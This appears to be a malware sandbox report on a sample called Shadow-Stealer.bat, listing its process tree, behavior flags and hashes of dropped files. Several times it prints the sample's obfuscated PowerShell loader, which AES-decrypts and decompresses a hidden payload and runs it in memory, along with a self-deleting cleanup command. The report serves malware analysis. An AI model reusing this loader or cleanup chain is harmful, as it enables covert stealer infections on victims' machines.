C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3976 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{f98e93b1-ae13-45dd-baab-43ff5f8a4d5a}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6e8d0acd-a966-4f47-a7a5-dca899832231}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6132 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{80bbc7d5-0111-463f-b649-8038ea64b44e}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{093674e6-d474-4d5d-9108-e374821f2f0b}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit5⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6676 /prefetch:83⤵
- NTFS ADS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{0dd0192d-dd8f-4392-9f8b-5dca309c3c58}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Shadow-Stealer.bat"2⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{9c278b0c-67f1-438c-8d20-f1d1faae9569}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{8a5775b4-0c43-41db-a226-0ea67b9f7285}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{e6c14402-cd06-4476-ae72-0aee4a527774}4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 1565⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit4⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Shadow-Stealer.bat2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 6604 -ip 66042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 7008 -ip 70082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 688 -p 6108 -ip 61082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6260 -ip 62602⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6056 -ip 60562⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.533636be-f85f-4ec7-bd5b-0d9c5b50edda.tmp.csvFilesize
42KB
MD517029652ea9120d890f025b846f586bf
SHA18d8ef714792fc0e6f71f905295dc03bbd73fc36e
SHA256793bfa45efb0db4e9b41a6393b2a950d66a72fb7a71637c3c47010beb11a0afa
SHA5127386d0769c0cb89727a7d2aefbaed02349cbc0e40f91acffba108f24bee864df1ea10f596349d0a1b46f4cf52d1a2d430030524a6a50288b739c444700b248b2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.89a2a5c3-6b8f-425f-864e-04a0dcff4a4b.tmp.txtFilesize
13KB
MD5ab7af922bb41dd3935690b19783eb26c
SHA1ad0a092713fd9400be3bed0519c9f10ea12ebceb
SHA256db60c3dca0910df96f1266704723dbea70e537f82f6f944b2c59b3b829960843
SHA51204d2af86e4ee476c53c79da2d62be893cf622c2c219f283b4d58e9fb1cc7f0743e722fa682bdb3c8c2cea9d2fd9cfc4b8f8dc1e47272711cde7119cac2ea2ce4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bfdc0f92-9444-41d2-9a3e-66379d1eaaf8.tmp.csvFilesize
41KB
MD5644830d5ae2523c9095228d6d6acf88c
SHA1547cab9068438d582efd244c12a13c9ea0f6b39f
SHA25670c6a616184c0ddc4db4389f355ad7f645a519b0b74939076f02cb102bb0aa78
SHA512a47bad64afe39497d92f12df76063e49ce1193a8b61d4203381140e220360214c7dfbbe1a7549bfbf6853c63eadccc68577688a62e2a6f44877c601dc61b20b4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d37b24ac-3403-4bf7-aa49-fd8b6a2aa58a.tmp.txtFilesize
13KB
MD507f3e8f9effb289523a32be3951da7ee
SHA16ee9e17443b3ee765c027e6585967e04161d875f
SHA256f4506e5420b84c1e081b26190619c071445caceaaafa2be5324ad68b32719f30
SHA512af21b370c7a5a7d8b09c02c01705ca95ff335ef9e977f038da7697c447536503cc364b53f91d0caec2f8b4abcb533b91556109f10f1336caca5d2cbe9696aee4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d8652241-622d-4508-9a09-da436c34af3a.tmp.txtFilesize
13KB
MD55039c1cdea9659d255897a1fe739f2cb
SHA10e3a68b1174e2e228e50a72787a5987eafc94642
SHA256788063fe5b69ee5d917a38e9f464dba9e17aaa3c50f9493c9c3fd56ba7d1a2ba
SHA51295e61ac4993cf0d64def5e0848fe65563d3190a7a3c5085f39a0c5e99e09212295b08be7e94603728ec657c828dd2e99bb043ae41c1eb7cbf9db3263971b895e
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.dd145f68-0ee5-405b-abda-1827dfe39a33.tmp.txtFilesize
13KB
MD5bd85a748349d95fd9e89d2a520264384
SHA1528ecd2fa32f014d84cd7a3f7c46c34785b86db7
SHA25649853fcc7dd7160b3bc932da01cb6191de009cce16e94a3fd30274313a11407b
SHA5123dfd1c5ad1774ab6f942f3e20119a83d4cc2aa659e795bbedb634f88dd081b2514f7ce5fefdb8a26695144c37eed9395a7876a66cd8f15e8c84eb4b55a2ec454
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de215c06-3155-46f8-8318-255d1261d459.tmp.csvFilesize
42KB
MD5ff5d52c50b73932c09c143c7c4c8765d
SHA1235f7451b4a939b92533b4f74218bfec3be69260
SHA2565ef56fe09209ae7e0a384dbeeaa875f2e72d24b7411efb2e8f97650e401e4e07
SHA51250afb137d9a372be8dd1221a3a0514aabf6fc9750b6500632b5cc1c99d5c68c22ba1f400c92eda8429468aa4adabeab1a4fd5adf58859606e5cbfcb8ee0dc662
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e60bf691-4917-45e0-a87b-3bc479c13f26.tmp.csvFilesize
42KB
MD534d573a3f2a9e5d66ea8409ef14f8415
SHA1fadbef7c0cc09ecd9de7cd2c0b54bf3e41fa6657
SHA2566c6929277d5fc9bda564c71ca62fdc40a191b7c99370311264306f0b57799014
SHA5129796f31282c7df3ce3997332b25b80a929a653e6c4a011145ca6beb709d48b1a7deb21c0a424bc889045fa5aa84324c631caaa969176fb05b8543a160d451247
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Shadow-Stealer.bat.exe.logFilesize
3KB
MD5918925b4ffb522c4188485a5e84ab6ed
SHA1f53ee7bacfae671d898075778f668cbf727c5d5e
SHA25618d5722b4bdd546da121b4c8756096755cab8cb7c40126d93644910d9292f343
SHA51282d4b87cc804c393a5c812a4dc327743ae928a44f8fd52902410ba43dfae738254e94437b0482c86a93dea416fcb87a34ed892f8541c7508545b3c98dfd4d8ea
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5f717f56b5d8e2e057c440a5a81043662
SHA10ad6c9bbd28dab5c9664bad04db95fd50db36b3f
